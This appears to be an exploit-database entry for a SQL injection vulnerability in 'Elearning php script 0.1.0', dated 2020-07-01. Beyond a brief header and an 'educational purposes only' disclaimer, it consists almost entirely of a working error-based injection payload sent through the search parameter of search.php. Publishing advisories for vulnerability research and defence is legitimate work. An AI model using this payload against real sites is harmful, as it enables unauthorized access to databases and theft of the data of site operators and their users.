Exploits / Vulnerability Discovered : 2020-07-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Elearning php script 0.1.0 search sql injection is for educational purposes only and if it is used you will do on your own risk!
Payload:
http://127.0.0.1/e/search.php?search=a&search_submit=Search
http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475
FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT
(ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search